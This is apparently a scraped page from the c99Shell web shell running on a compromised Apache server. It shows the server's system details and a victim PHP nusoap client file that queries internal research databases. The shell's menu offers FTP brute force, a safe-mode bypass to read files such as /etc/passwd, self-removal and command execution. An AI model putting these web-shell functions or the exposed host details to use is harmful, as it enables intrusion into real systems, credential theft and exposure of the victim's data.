110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/nusoap/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?



    require_once('lib/nusoap/nusoap.php');



    //$client = new soapclient("http://118.175.19.15/mis/centralize/admin/response.php");



    //$result = $client->call('SubmitUpdate',array('collegeID'=>'03'));



    //$result = $client->call('getUpdateInfo',array('queryID'=>'1'));



    //print_r($tmp);



    $client = new soapclient('http://202.29.105.1/emanage/nusoap/server.php');

    //$client = new soapclient('http://202.29.105.1/emanage/nusoap/server.php');

    

    //$result = $client->call('getResearchTB',array('researchCode'=>'2'));

    //$result = $client->call('test');

    

    $result = $client->call('getResearchID',array('tableName'=>'research_tb'));

    //$result = $client->call('getResearchID',array('tableName'=>'research_char_tb'));

    //$result = $client->call('getResearchID',array('tableName'=>'research_file_tb'));

    //$result = $client->call('getResearchID',array('tableName'=>'research_public_tb'));

    //$result = $client->call('getResearchID',array('tableName'=>'research_success_tb'));

    

    //$result = $client->call('getResearchCharTB',array('researchCode'=>'1'));

    //$result = $client->call('getResearchCharTB',array('researchCode'=>'1'));

        

?>



<meta http-equiv="Content-Type" content="text/html; charset=tis-620">



<?

    //$msg = "";



    //for($i=0;$i<sizeof($result);$i++){

        //echo base64_decode($result[0])." ,".base64_decode($result[1])." ,".base64_decode($result[2])." ,".base64_decode($result[3])." ,".base64_decode($result[4])." ,".base64_decode($result[5])." ,".base64_decode($result[6])." ,".base64_decode($result[7])." ,".base64_decode($result[8]);

        //$msg = $msg.base64_decode($result[$i]).",";

    //}



    //echo $msg;



    $data = split(',',$result);

    //print_r($data);

    //echo sizeof($data);

    //echo $result;

    //echo $data;    



    for($i=0;$i<sizeof($data);$i++){

        $result = $client->call('getResearchTB',array('researchCode'=>$data[$i]));

        //$result = $client->call('getResearchCharTB',array('researchCode'=>$data[$i]));

        //$result = $client->call('getResearchFileTB',array('researchCode'=>$data[$i]));

        //$result = $client->call('getResearchPublicTB',array('researchCode'=>$data[$i]));

        //$result = $client->call('getResearchSuccessTB',array('researchCode'=>$data[$i]));

                

        $msg = "";

        for($n=0;$n<sizeof($result);$n++){        

            $msg = $n == 0 ? base64_decode($result[$n]) : $msg.",".base64_decode($result[$n]);

        }

        $msg .= "<br>";



        echo $msg;

    }



?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: